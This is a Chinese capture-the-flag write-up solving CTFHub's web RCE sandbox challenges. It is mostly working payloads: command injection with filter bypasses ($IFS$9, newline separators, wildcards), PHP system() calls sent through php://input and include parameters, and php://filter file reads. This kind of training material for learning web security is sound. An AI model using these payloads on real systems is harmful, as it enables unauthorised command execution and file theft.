[CTFHub] Web RCE Write ups
阿新 • • 發佈:2020-12-30
命令注入
輸入
127.0.0.1 | ls -al
檢視檔案
127.0.0.1 | cat [flag檔名]
過濾cat
用less more就行
過濾空格
用
$IFS$9
代替空格,然後輸入
127.0.0.1|cat$IFS$9lag_3760913111752.php
過濾目錄分隔符
127.0.0.1;cd flag_is_here;cat flag_11132792223723.php
過濾運算子
127.0.0.1;cat flag_209472690126349.php
命令注入-綜合練習
先輸入這個顯示flag檔案所在位置,注意把flag寫成萬用字元
http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0als$IFS$9-al
最後答案
http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0amore$IFS$9fla*_8941778912527.php
檔案包含
這道題get與post結合起來
get如下
http://challenge-647375ee75c1e32b.sandbox.ctfhub.com:10080/?file= shell.txt
post如下
ctfhub=system("cat /flag");
參考文章:
https://blog.csdn.net/Xxy605/article/details/107556509
https://winny.work/ctfhub技能樹_web_rce之eval、檔案包含/680.html
查詢flag
find / -name flag*
php://input
用burp攔截,傳送到Repeater,然後構造post請求
POST /?file=php://input HTTP/1.1
Host: challenge-b6e75eaa899f147c.sandbox.ctfhub.com:10080
Cache-Control: max-age= 0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 38
<?php system('find / -name *flag*');?>
找到flag檔案,輸出
證明是可以使用php://input
遠端包含
這裡POST與GET都可以,為什麼呢?
GET /?file=php://input HTTP/1.1
Host: challenge-4c672ad46ce5abfc.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 29
<?php system('cat /flag*');?>
讀取原始碼
POST /?file=php://filter/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0
另外一種答案
POST /?file=php://filter/read=convert.base64-encode/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0
eval執行
http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("find / -name *flag*");
找到flag檔案
http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("cat /flag_29995");